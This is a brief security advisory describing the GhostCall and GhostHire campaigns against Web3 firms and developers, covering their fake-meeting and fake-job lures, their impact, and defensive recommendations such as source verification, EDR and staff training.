Attacks via Zoom and GitHub: GhostCall and GhostHire Campaigns Expanding Across the Web3 Landscape

• 04/11/2025

Cybersecurity researchers have recently uncovered two sophisticated attack campaigns targeting the global Web3 and blockchain ecosystem — named GhostCall and GhostHire.
Both are linked to BlueNoroff, a subgroup of the infamous Lazarus Group, active since at least 2017 under the broader SnatchCrypto operation.
Their primary targets include technology firms, investment funds, and Web3 developers across Japan, Australia, India, France, Singapore, Turkey, Sweden, and Hong Kong.

Two Different Attack Vectors — One Common Goal

• GhostCall targets executives and employees of tech and investment organizations through fake investment meeting invites sent via Zoom or Microsoft Teams.
  Victims are redirected to a spoofed meeting page showing a pre-recorded “live call,” before being prompted to “update SDK.” Once they approve, a malicious AppleScript (macOS) or PowerShell (Windows) payload is downloaded, enabling full device compromise.

• GhostHire, on the other hand, lures Web3 developers with fake job offers via Telegram, sharing a ZIP file as a “coding test.”
  Upon opening the file, the victim’s system downloads malicious modules from a fake GitHub repository, executing scripts that allow attackers to take over the device remotely.

Severe Impact on Businesses and Individuals

Once infected, the malware can:

• Access sensitive business data, cryptocurrency wallets, and cloud accounts.

• Steal API keys, browser passwords, and system credentials.

• Cause project leaks, financial losses, and reputational damage.

What makes these attacks particularly dangerous is their ability to:

• Operate cross-platform (Windows, macOS, Linux)

• Combine social engineering with custom-built malware

• Exploit legitimate services like Zoom, Teams, GitHub, and Telegram

• Even leverage AI tools (such as GPT-4o) to generate fake profiles, messages, and videos that appear strikingly real.

DTG CORP’s Expert Recommendations

To minimize risks from such evolving threats, organizations should:

• Verify all communication sources before opening files or links from Zoom, GitHub, or Telegram.

• Restrict data access for employees and AI agents to sensitive systems.

• Implement Endpoint Detection and Response (EDR) to monitor unusual behaviors.

• Train staff to identify social engineering and fake recruitment/investment scams.

While there are no confirmed cases in Vietnam yet, the widespread use of Telegram, Zoom, Teams, and GitHub means the risk of exposure remains high.
Organizations in Web3, fintech, and technology sectors are advised to strengthen their cybersecurity posture, update defense tools, and remain vigilant — because in today’s connected world, a single careless click could open the door for an entire cyber operation.

(Information referenced from WhiteHat)